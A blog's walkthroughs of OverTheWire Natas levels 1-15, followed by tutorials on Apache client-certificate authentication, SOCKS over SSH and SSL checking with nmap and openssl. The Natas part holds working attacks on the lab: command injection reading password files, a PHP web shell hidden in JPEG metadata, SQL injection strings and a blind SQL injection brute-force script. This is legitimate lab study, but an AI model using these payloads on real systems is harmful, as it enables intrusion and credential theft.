Solutions of NATAS 1-15

Hello Folks,

In this post, I will share with you the solutions of Natas challenges from one to fifteen. It is strongly recommended not to look at the solutions without cogitating.

Natas0:

Username and password have been already provided for Natas0.

URL: http://natas0.natas.labs.overthewire.org

natas0/natas0

Solution:

Login the page with the credential natas0/natas0.

On Chrome Browser right-click and “View page source”

Password for natas1 is : gtVrDuiDfck831PqWsLEZy5gyDz1clto

Natas1:

URL: http://natas1.natas.labs.overthewire.org/

Solution:

Login the page with the credential that you got from the natas0.

In this challenge you can not do right-clicking, instead you should use F12 shortcut function key to open Web developer tools. And the select Elements tab.

Password for natas2 is : ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi

 

Natas2:

URL: http://natas2.natas.labs.overthewire.org

Solution:

Login the page with the credential that you got from the natas1.

On Chrome Browser right-click and “View page source”

Actually it is not obvious, but we have a hint from the tag <img src=”files/pixel.png”>

<body>
<h1>natas2</h1>
<div id="content">
There is nothing on this page
<img src="files/pixel.png">
</div>
</body></html>

Let’s make a request for the URL http://natas2.natas.labs.overthewire.org/files/

You can see the file users.txt, which holds the number of users’ credentials.

Password for natas3 is : sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14

Natas3:

URL: http://natas3.natas.labs.overthewire.org

For this challenge, we should have basic understanding of robots.txt which is a Robots Exclusion Protocol, which indicates whether certain user agents (web-crawling software) can or cannot crawl parts of a website. These crawl instructions are specified by “disallowing” or “allowing” the behavior of certain (or all) user agents. For more information here.

Solution:

Login the page with the credential that you got from the natas2 and “View Page Source” on Google Chrome.

 

Let’s make request to URL http://natas3.natas.labs.overthewire.org/robots.txt

As it indicated in the introduction which tells the all user agents(all crawlers) not to access and index contents of the folder s3cr3t. If we make another request for the URL http://natas3.natas.labs.overthewire.org/s3cr3t/ you will see users.txt

Password for natas4 is: Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

Natas4:

URL: http://natas4.natas.labs.overthewire.org

To solve this challenge you need to have basic understanding of  de-facto HTTP request headers. For this challenge, our solution is Referer header.

Solution:

Referer is an HTTP header field that identifies the address of the webpage (i.e. the URI or IRI) that linked to the resource being requested. By checking the referrer, the new webpage can see where the request originated.(Wikipedia)

curl -v -H "Referer: http://natas5.natas.labs.overthewire.org/"  -u  natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ http://natas4.natas.labs.overthewire.org

Password for natas5 is : iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

Natas5:

URL: http://natas5.natas.labs.overthewire.org

When we send a web request to web server via curl, Web server sends  a Set-Cookie header to the user agent. And with every request user agent will send back all previously stored cookies to the server with Cookie: header.

curl -v -u "natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" http://natas5.natas.labs.overthewire.org/
* About to connect() to natas5.natas.labs.overthewire.org port 80 (#0)
*   Trying 176.9.9.172...
* Connected to natas5.natas.labs.overthewire.org (176.9.9.172) port 80 (#0)
* Server auth using Basic with user 'natas5'
> GET / HTTP/1.1
> Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
> User-Agent: curl/7.29.0
> Host: natas5.natas.labs.overthewire.org
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Sat, 24 Nov 2018 14:09:16 GMT
< Server: Apache/2.4.10 (Debian)
< Set-Cookie: loggedin=0
< Vary: Accept-Encoding
< Content-Length: 855
< Content-Type: text/html; charset=UTF-8
< 

Solution:

There is no clear answer of this challenge. I just guessed it and modify the Cookie by setting the Cookie: loggedin=1

curl -v -H "Cookie: loggedin=1" -u natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq "http://natas5.natas.labs.overthewire.org"
* About to connect() to natas5.natas.labs.overthewire.org port 80 (#0)
*   Trying 176.9.9.172...
* Connected to natas5.natas.labs.overthewire.org (176.9.9.172) port 80 (#0)
* Server auth using Basic with user 'natas5'
> GET / HTTP/1.1
> Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
> User-Agent: curl/7.29.0
> Host: natas5.natas.labs.overthewire.org
> Accept: */*
> Cookie: loggedin=1
> 
< HTTP/1.1 200 OK
< Date: Sat, 24 Nov 2018 14:11:43 GMT
< Server: Apache/2.4.10 (Debian)
< Set-Cookie: loggedin=1
< Vary: Accept-Encoding
< Content-Length: 890
< Content-Type: text/html; charset=UTF-8
< 
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas5", "pass": "iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" };</script></head>
<body>
<h1>natas5</h1>
<div id="content">
<strong>Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1</strong></div>
</body>
</html>
* Connection #0 to host natas5.natas.labs.overthewire.org left intact

Password for the natas6 is : aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Natas6:

URL: http://natas6.natas.labs.overthewire.org

When we check the source code. It compares the value of the $secret with the value of the input element. If both values are equal, password for natas7 will be printed.

<?

include "includes/secret.inc";

    if(array_key_exists("submit", $_POST)) {
        if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
    }
?>

Solution: 

The include statement includes and evaluates the specified file.(php Manual).  Let’s try to access the include/secret.inc file by making a web request. URL http://natas6.natas.labs.overthewire.org/includes/secret.inc

As you see value of $secret variable is FOEIUWGHFEEUHOFUOIU. if you put this value to input form and submit the form.

 

 

Password for natas7 is: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

Natas7:

URL: http://natas7.natas.labs.overthewire.org

Solution:

Web pages are rendered by the value of $_REQUEST[‘page’]. As an example . http://natas7.natas.labs.overthewire.org/index.php?page=about (To render about page.)

What if we set the page value to/etc/natas_webpass/natas8 ? So our URL will be http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8

 

 

 

Password for natas8 is: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

Natas8:

URL: http://natas8.natas.labs.overthewire.org

We need to simple reverse engineering to solve this challenge. Key thing is the function encodeSecret()

We must put a value into the input form that function yields us the value 3d3d516343746d4d6d6c315669563362

 

Solution:

You can use the URL https://repl.it/repls/SoftElegantPublishers  for your php sandbox.

<?php

echo base64_decode((strrev(hex2bin("3d3d516343746d4d6d6c315669563362"))));

//oubWYf2kBq
?>

 

If you put the value oubWYf2kBq into the input secret you will get the password for natas9.

 

Password for natas9 is: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

Natas9:

URL: http://natas9.natas.labs.overthewire.org

Solution:

Running multiple commands by separating semicolon(;).

ls;cat /etc/natas_webpass/natas10

Password for natas10 is: nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

Natas10:

URL: http://natas10.natas.labs.overthewire.org

Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>
</pre>

Solution: 

If you check the snipped of code above some of the special characters checked by the preg_match() php funtion. We need to bypass this check somehow.

Solution1: .* cat /etc/natas_webpass/natas11

Solution2: Using the URL Encoding code to escaping the preg_match() function.

http://natas10.natas.labs.overthewire.org/index.php?needle=pass%0A%20cat%20/etc/natas_webpass/natas11&submit=Search

.htaccess:AuthType Basic
.htaccess: AuthName "Authentication required"
.htaccess: AuthUserFile /var/www/natas/natas10//.htpasswd
.htaccess: require valid-user
.htpasswd:natas10:$1$XOXwo/z0$K/6kBzbw4cQ5exEWpW5OV0
.htpasswd:natas10:$1$mRklUuvs$D4FovAtQ6y2mb5vXLAy.P/
.htpasswd:natas10:$1$SpbdWYWN$qM554rKY7WrlXF5P6ErYN/
/etc/natas_webpass/natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

Password for natas11 is: U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

Natas11:

URL: http://natas11.natas.labs.overthewire.org/

<?

$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {
    $key = '<censored>';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
    $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}

function loadData($def) {
    global $_COOKIE;
    $mydata = $def;
    if(array_key_exists("data", $_COOKIE)) {
    $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
    if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {
        if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
        $mydata['showpassword'] = $tempdata['showpassword'];
        $mydata['bgcolor'] = $tempdata['bgcolor'];
        }
    }
    }
    return $mydata;
}

function saveData($d) {
    setcookie("data", base64_encode(xor_encrypt(json_encode($d))));
}

$data = loadData($defaultdata);

if(array_key_exists("bgcolor",$_REQUEST)) {
    if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {
        $data['bgcolor'] = $_REQUEST['bgcolor'];
    }
}

saveData($data);



?>

 

Solution: Logic of XOR Encryption

If you check the source code and the server responses, you realize that  you know the cipher and plain text, so we can extract the xor_encryption key for this challenge.

Plain Text  XOR Key = Cipher Text

Cipher Text XOR Plain Text = Key

tesla@otuken:~$ curl -v -u natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK http://natas11.natas.labs.overthewire.org/
*   Trying 176.9.9.172...
* TCP_NODELAY set
* Connected to natas11.natas.labs.overthewire.org (176.9.9.172) port 80 (#0)
* Server auth using Basic with user 'natas11'
> GET / HTTP/1.1
> Host: natas11.natas.labs.overthewire.org
> Authorization: Basic bmF0YXMxMTpVODJxNVRDTU1ROXh1Rm9JM2RZWDYxczdPWkQ5SktvSw==
> User-Agent: curl/7.58.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Tue, 27 Nov 2018 17:41:41 GMT
< Server: Apache/2.4.10 (Debian)
< Set-Cookie: data=ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw%3D
< Vary: Accept-Encoding
< Content-Length: 1085
< Content-Type: text/html; charset=UTF-8

cipher is: ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw

<?php
$data=array( "showpassword"=>"no", "bgcolor"=>"#ffffff");
echo (json_encode($data));
?>

Result:

{"showpassword":"no","bgcolor":"#ffffff"}

Let’s use  {“showpassword”:”no”,”bgcolor”:”#ffffff”} as our key.

 

 

Key is: qw8J

 

Encrypted cookie for showing password is:

ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK

 

curl -u natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK --cookie "data=ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK" http://natas11.natas.labs.overthewire.org

 

 

Password for natas12 is: EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3

Natas12:

URL: http://natas12.natas.labs.overthewire.org/

1- Install exiftool.

2- Create a very small jpg image which is less than 1KiB and name it white.jpg (small white background is enough)

3- Next step is injecting malicious php code inside the white.jpg by using exiftool.

exiftool -documentname="<?php system('cat /etc/natas_webpass/natas13'); ?>" white.jpg

 

tesla@otuken:~/Downloads$ exiftool white.jpg
ExifTool Version Number         : 10.80
File Name                       : white.jpg
Directory                       : .
File Size                       : 917 bytes
File Modification Date/Time     : 2018:11:27 22:11:00+04:00
File Access Date/Time           : 2018:11:27 22:11:00+04:00
File Inode Change Date/Time     : 2018:11:27 22:11:00+04:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Exif Byte Order                 : Big-endian (Motorola, MM)
Document Name                   : <?php system('cat /etc/natas_webpass/natas13'); ?>
X Resolution                    : 1
Y Resolution                    : 1
Resolution Unit                 : None
Y Cb Cr Positioning             : Centered
Image Width                     : 51
Image Height                    : 51
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 51x51
Megapixels                      : 0.003

 

4- Open the browser and make web request to http://natas12.natas.labs.overthewire.org/

5- Open browser’s “Developer tools.” and the remove the type=”hidden” tag

6- And modify the suffix from jpg to php.

7- Click the link of the uploaded file. it will be interpret by the php.

 

 

 

Password for natas13 is: jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY

Natas13: 

URL: http://natas13.natas.labs.overthewire.org

You can use the same method as we did on natas12. Only thing you have to do is changing the file.

exiftool -documentname="<?php system('cat /etc/natas_webpass/natas14'); ?>" white.jpg

 

 

Password for natas14 is: Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1

Natas14:

URL: http://natas14.natas.labs.overthewire.org

 

if(array_key_exists("username", $_REQUEST)) { 
    $link = mysql_connect('localhost', 'natas14', '<censored>'); 
    mysql_select_db('natas14', $link); 
     
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\""; 
    if(array_key_exists("debug", $_GET)) { 
        echo "Executing query: $query<br>"; 
    } 

    if(mysql_num_rows(mysql_query($query, $link)) > 0) { 
            echo "Successful login! The password for natas15 is <censored><br>"; 
    } else { 
            echo "Access denied!<br>"; 
    } 
    mysql_close($link); 
} else { 
?>

Solution:

username > ” or “1”=”1

password > ” or “1”=”1

 

Password for natas15 is: AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

Natas15:

<? 

/* 
CREATE TABLE `users` ( 
  `username` varchar(64) DEFAULT NULL, 
  `password` varchar(64) DEFAULT NULL 
); 
*/ 

if(array_key_exists("username", $_REQUEST)) { 
    $link = mysql_connect('localhost', 'natas15', '<censored>'); 
    mysql_select_db('natas15', $link); 
     
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\""; 
    if(array_key_exists("debug", $_GET)) { 
        echo "Executing query: $query<br>"; 
    } 

    $res = mysql_query($query, $link); 
    if($res) { 
    if(mysql_num_rows($res) > 0) { 
        echo "This user exists.<br>"; 
    } else { 
        echo "This user doesn't exist.<br>"; 
    } 
    } else { 
        echo "Error in query.<br>"; 
    } 

    mysql_close($link); 
} else { 
?> 

//omitted...

Solution:

My first guess to solve this challenge was the into outfile statement. Unluckily, I do not have permission to create a file. For more information check secure_file_priv option of mysql server.

Example:

select * from users where username=”natas16″ into outfile “/var/www/html”

After three days of trying other methods. I stuck on this challenge. So, I had to get some hint. Hint was the “Blind Sql Injection”. After red over some pages in the blogs, I understand the logic and create my own solution to find the password. Basically script does brute-force by trying all the alphabets(uppercase, lowercase) and numbers.

 

#!/bin/bash

letters=""
for i in {a..z}
do
	letters+=$i
done

for i in {A..Z}
do
	letters+=$i
done

for i in {0..9}
do
	letters+=$i
done
#################################################################
echo $letters
echo ""
echo ""

key=""


for count in {1..40}
do
for (( i=0; i<${#letters}; i++ )); do
  letter="${letters:$i:1}"
	curl -u natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J "http://natas15.natas.labs.overthewire.org/index.php?debug&username=natas16%22%20%20and%20password%20like%20binary%20%22$key$letter%" | grep -i "This user exist."
	if [ $? -eq 0 ] ; then
		key+=$letter
	fi
done
done
echo "key is: $key"

 

 

Password for natas16 is: WaIHEacj63wnNIBROHeqi3p9t0m5nhmh

SSL Client Certificate Authentication with Apache

Creating CA Certificate

We use this certificate for only signing certificates that we use for the clients and our web servers. It should be kept very secure. If it is disclosed other certificates signed with this certificate will be disclosed as well.

openssl genrsa -des3 -out ca.key 4096
openssl req -new -x509 -days 365 -key ca.key -out ca.crt

Creating a Key and CSR for the Client

Creating a client certificate is the same as creating Server certificate.

openssl req -newkey rsa:2048 -nodes -keyout client.key -out client.csr

Signing the client certificate with previously created CA.

Not: Do not forget to change serial each time you sign new certificate, otherwise may get serial conflict error in the web browsers.

[root@centos7 certs]# openssl x509 -req -days 365 -in client.csr -CA ca.crt -CAkey ca.key -set_serial 01 -out client.crt
Signature ok
subject=/C=TR/L=Default City/O=Client Certificate/CN=Client Certificate
Getting CA Private Key
Enter pass phrase for ca.key:

Creating a Key and CSR for the Server(Apache Virtual Host ankara.example.com)

openssl req -newkey rsa:2048 -nodes -keyout ankara.key -out ankara.csr

Signing Server Certificate with previously created CA.

Do not forget to change serial number. As it may conflict with existing one.

openssl x509 -req -days 365 -in ankara.csr -CA ca.crt -CAkey ca.key -set_serial 02 -out ankara.crt

Apache Configuration for the Authentication with Client Certificate

This sample configuration shows how to force server to request client certificate.

<Directory /srv/ankara/www>
	Require all granted
</Directory>


<VirtualHost *:443>
	SSLEngine On
	SSLCertificateFile /etc/httpd/conf.d/certs/ankara.crt
	SSLCertificateKeyFile /etc/httpd/conf.d/certs/ankara.key
	ServerName ankara.example.com
	DocumentRoot /srv/ankara/www 
	SSLVerifyClient require
	SSLVerifyDepth 5
	SSLCACertificateFile "/etc/httpd/conf.d/certs/ca.crt"
</VirtualHost>

The depth actually is the maximum number of intermediate certificate issuers, i.e. the number of CA certificates which are max allowed to be followed while verifying the client certificate. A depth of 0 means that self-signed client certificates are accepted only, the default depth of 1 means the client certificate can be self-signed or has to be signed by a CA which is directly known to the server (i.e. the CA’s certificate is under SSLCACertificatePath), etc.

Reference: https://httpd.apache.org/docs/2.4/mod/mod_ssl.html

Experimenting with Curl

Without specifying the client certificate

gokay@ankara:~/certs$ curl https://ankara.example.com -v
* Rebuilt URL to: https://ankara.example.com/
* Trying 192.168.122.30...
* Connected to ankara.example.com (192.168.122.30) port 443 (#0)
* found 148 certificates in /etc/ssl/certs/ca-certificates.crt
* found 597 certificates in /etc/ssl/certs
* ALPN, offering http/1.1
* gnutls_handshake() failed: Handshake failed
* Closing connection 0
curl: (35) gnutls_handshake() failed: Handshake failed

 

With client certificate

gokay@ankara:~/certs$ curl https://ankara.example.com --key client.key --cert client.crt --cacert ca.crt -v
* Rebuilt URL to: https://ankara.example.com/
* Trying 192.168.122.30...
* Connected to ankara.example.com (192.168.122.30) port 443 (#0)
* found 1 certificates in ca.crt
* found 597 certificates in /etc/ssl/certs
* ALPN, offering http/1.1
* SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256
* server certificate verification OK
* server certificate status verification SKIPPED
* common name: ankara.example.com (matched)
* server certificate expiration date OK
* server certificate activation date OK
* certificate public key: RSA
* certificate version: #1
* subject: C=TR,L=Default City,O=Ankara LTD,CN=ankara.example.com
* start date: Sun, 24 Dec 2017 10:00:20 GMT
* expire date: Mon, 24 Dec 2018 10:00:20 GMT
* issuer: C=TR,L=Default City,O=BlueTech CA,OU=CA,CN=BlueTech CA
* compression: NULL
* ALPN, server did not agree to a protocol
> GET / HTTP/1.1
> Host: ankara.example.com
> User-Agent: curl/7.47.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Sun, 24 Dec 2017 10:21:15 GMT
< Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips
< Last-Modified: Sun, 24 Dec 2017 10:19:51 GMT
< ETag: "3b-5611363e4a8e0"
< Accept-Ranges: bytes
< Content-Length: 59
< Content-Type: text/html; charset=UTF-8
< 
<h1>My Secure Page Ankara</h1>
<h2>ankara.example.com</h2>
* Connection #0 to host ankara.example.com left intact

 

Converting certificate and to pkcs12 format

If you want to import a certificate to a web browser, you have to convert your existing certificate other than PEM format. For the Mozilla Firefox, you need to convert it  to pkcs12 format.

openssl pkcs12 -export -out ankara.pfx -inkey ankara.key -in ankara.crt -certfile ca.crt

Only thing we need to do it import ankara.pfx to our browser.

Disabling Client Certificate Authentication

Comment out last three lines between the <VirtualHost> and </VirtualHost> directive.

<Directory /srv/ankara/www>
	Require all granted
</Directory>


<VirtualHost *:443>
	SSLEngine On
	SSLCertificateFile /etc/httpd/conf.d/certs/ankara.crt
	SSLCertificateKeyFile /etc/httpd/conf.d/certs/ankara.key
	ServerName ankara.example.com
	DocumentRoot /srv/ankara/www 
	#SSLVerifyClient require
	#SSLVerifyDepth 5
	#SSLCACertificateFile "/etc/httpd/conf.d/certs/ca.crt"
</VirtualHost>

 

Only thing that we need to do is specifying CA certificate or providing  -k option to curl for insecure SSL connection.

gokay@ankara:~/certs$ curl https://ankara.example.com  --cacert ca.crt 
<h1>My Secure Page Ankara</h1>
<h2>ankara.example.com</h2>

 

 

SOCKS

SOCKS stands for Socket Secure. It exchanges data packets between client and server via proxy. It operates on the Session Layer of the OSI model.

It allows users to surf on the Internet anonymously. More than that It gives you accessibility of applications only one secure port connection.

In this post, I will implement fundamental usage of SOCKS. On the client side we just need open-ssh client and tsocks. open-ssh client exists all Linux distributions. So We only need tsocks. tsocks is a library to implement SOCKS.

Install tsocks(client)

gns3@gns3:~/Programs$ sudo apt-get install tsocks

Configure tsocks(client)

Open /etc/tsocks.conf and add lines below at the end of the line.

server = 127.0.0.1
server_port = 1080

Initiate Connection(client)

Initiate connection between client and SOCKS proxy. -D option is the most important argument for this purpose.

It tells that whenever connection is made port 1080, connection is forwarded to the host istanbul over ssh.

For more information. $ man ssh

gns3@gns3:~$ ssh -ND 1080 username@istanbul
-N Do not execute a remote command. This is useful for just forwarding ports.

-D [bind_address:]port
Specifies a local “dynamic” application-level port forwarding. This works by allocating a socket to listen to port on the
local side, optionally bound to the specified bind_address. Whenever a connection is made to this port, the connection is
forwarded over the secure channel, and the application protocol is then used to determine where to connect to from the
remote machine. Currently the SOCKS4 and SOCKS5 protocols are supported, and ssh will act as a SOCKS server. Only root
can forward privileged ports. Dynamic port forwardings can also be specified in the configuration file.

SOCKS server side

Only thing we need is on SOCKS server side is permission for the ssh connection and ssh server up and running.

Diagram:

It is depicted below diagram to leverage to SOCKS service.

 

 

 

 

 

 

Experiment:

Most excited part of this post. First scenario I will request connection to the https://whatismyip.com via firefox without leveraging tsocks. And Second Scenario I will request the same url with tsocks.

Scenario 1:

Without tsocks.

gns3@gns3:~$ firefox

 

 

 

 

 

 

Scenario 2:

With tsocks.

gns3@gns3:~$ tsocks firefox

 

 

 

 

 

 

Happy anonymity. 🙂

SSL Validation and Troubleshooting

There may be times when we have a problem with SSL certificate because of some issues such a missing intermediate certificate, self-sign certificate and etc,. It may be exhausting to figure out what exactly the problem is. Even though, web browsers give some details about problem, It is not enough to solve the problem sometimes. Actually some tools has existed battling with this problem. In this post I will give you an information about the tools. I hope it will be fruitful.

1- SSL Labs: This web site is very helpful. It shows all TLS versions and cipher suits that your website support. Besides, supported java versions and web browsers by your website. If you do not like working on command prompt, it is for you!

2- Calomel:  Add-on SSL Validation toolbar for Mozilla Firefox. It grades your SSL website strength in terms of some parameters such PFS, cipher suits, Key exchange, Signature etc,. You can see below sample validation for manintheit.org

 

3- Nmap: Nmap(Network Mapper) is open source tool. It was designed  for network exploration and scanning large networks. It is so versatile that It is also used for OS detection, Host discovery and  SSL validation. You can see below example for the website manintheit.org.

Install Nmap:

#yum install nmap
[root@rhce ~]# nmap -sV --script ssl-enum-ciphers -p 443 manintheit.org

Starting Nmap 6.40 ( http://nmap.org ) at 2017-06-06 18:17 +03
Nmap scan report for manintheit.org (94.73.150.177)
Host is up (0.0086s latency).
rDNS record for 94.73.150.177: 94-73-150-177.cizgibilgisayar.com
PORT    STATE SERVICE  VERSION
443/tcp open  ssl/http Apache httpd
| ssl-enum-ciphers:
|   SSLv3: No supported ciphers found
|   TLSv1.0:
|     ciphers:
|       TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA - strong
|       TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA - strong
|       TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA - strong
|       TLS_ECDHE_RSA_WITH_RC4_128_SHA - strong
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA - strong
|       TLS_RSA_WITH_AES_128_CBC_SHA - strong
|       TLS_RSA_WITH_AES_256_CBC_SHA - strong
|       TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - strong
|       TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - strong
|       TLS_RSA_WITH_IDEA_CBC_SHA - weak
|       TLS_RSA_WITH_RC4_128_MD5 - strong
|       TLS_RSA_WITH_RC4_128_SHA - strong
|       TLS_RSA_WITH_SEED_CBC_SHA - strong
|     compressors:
|       NULL
|   TLSv1.1:
|     ciphers:
|       TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA - strong
|       TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA - strong
|       TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA - strong
|       TLS_ECDHE_RSA_WITH_RC4_128_SHA - strong
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA - strong
|       TLS_RSA_WITH_AES_128_CBC_SHA - strong
|       TLS_RSA_WITH_AES_256_CBC_SHA - strong
|       TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - strong
|       TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - strong
|       TLS_RSA_WITH_IDEA_CBC_SHA - weak
|       TLS_RSA_WITH_RC4_128_MD5 - strong
|       TLS_RSA_WITH_RC4_128_SHA - strong
|       TLS_RSA_WITH_SEED_CBC_SHA - strong
|     compressors:
|       NULL
|   TLSv1.2:
|     ciphers:
|       TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA - strong
|       TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA - strong
|       TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 - strong
|       TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 - strong
|       TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA - strong
|       TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 - strong
|       TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 - strong
|       TLS_ECDHE_RSA_WITH_RC4_128_SHA - strong
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA - strong
|       TLS_RSA_WITH_AES_128_CBC_SHA - strong
|       TLS_RSA_WITH_AES_128_CBC_SHA256 - strong
|       TLS_RSA_WITH_AES_128_GCM_SHA256 - strong
|       TLS_RSA_WITH_AES_256_CBC_SHA - strong
|       TLS_RSA_WITH_AES_256_CBC_SHA256 - strong
|       TLS_RSA_WITH_AES_256_GCM_SHA384 - strong
|       TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - strong
|       TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - strong
|       TLS_RSA_WITH_IDEA_CBC_SHA - weak
|       TLS_RSA_WITH_RC4_128_MD5 - strong
|       TLS_RSA_WITH_RC4_128_SHA - strong
|       TLS_RSA_WITH_SEED_CBC_SHA - strong
|     compressors:
|       NULL
|_  least strength: weak

 

4-OpenSSL: OpenSSL is a open source implementation of SSL and TLS protocols. Libraries written in the C language. It can be used for creating random keys, signing certificate, creating self-signed certificate, debugging of SSL websites. Personally I prefer using OpenSSL due to the fact that it is very fast and no need to install extra dependencies. It saved my life all the time 🙂 . In debug mode it prints everything client hello,server hello, cipher suites , TLS version, SSL certificates etc,. Almost everything.

[demo@rhce ~]$ openssl s_client -connect manintheit.org:443 -debug
CONNECTED(00000003)
write to 0xee8a60 [0xf276f0] (247 bytes => 247 (0xF7))
0000 - 16 03 01 00 f2 01 00 00-ee 03 03 59 36 d1 17 bb   ...........Y6...
0010 - 4f c0 a9 6e cf c2 76 4d-5b 24 c4 1c 93 0a ff dd   O..n..vM[$......
0020 - 99 1a 8d 4e c4 13 37 6e-43 23 b6 00 00 84 c0 30   ...N..7nC#.....0
0030 - c0 2c c0 28 c0 24 c0 14-c0 0a 00 a3 00 9f 00 6b   .,.(.$.........k
0040 - 00 6a 00 39 00 38 00 88-00 87 c0 32 c0 2e c0 2a   .j.9.8.....2...*
0050 - c0 26 c0 0f c0 05 00 9d-00 3d 00 35 00 84 c0 2f   .&.......=.5.../
0060 - c0 2b c0 27 c0 23 c0 13-c0 09 00 a2 00 9e 00 67   .+.'.#.........g
0070 - 00 40 00 33 00 32 00 9a-00 99 00 45 00 44 c0 31   .@.3.2.....E.D.1
0080 - c0 2d c0 29 c0 25 c0 0e-c0 04 00 9c 00 3c 00 2f   .-.).%.......<./
0090 - 00 96 00 41 c0 12 c0 08-00 16 00 13 c0 0d c0 03   ...A............
00a0 - 00 0a 00 07 c0 11 c0 07-c0 0c c0 02 00 05 00 04   ................
00b0 - 00 ff 01 00 00 41 00 0b-00 04 03 00 01 02 00 0a   .....A..........
00c0 - 00 08 00 06 00 19 00 18-00 17 00 23 00 00 00 0d   ...........#....
00d0 - 00 20 00 1e 06 01 06 02-06 03 05 01 05 02 05 03   . ..............
00e0 - 04 01 04 02 04 03 03 01-03 02 03 03 02 01 02 02   ................
00f0 - 02 03 00 0f 00 01 01                              .......
read from 0xee8a60 [0xf2cc50] (7 bytes => 7 (0x7))
0000 - 16 03 03 00 42 02                                 ....B.
0007 - <SPACES/NULS>
read from 0xee8a60 [0xf2cc5a] (64 bytes => 64 (0x40))
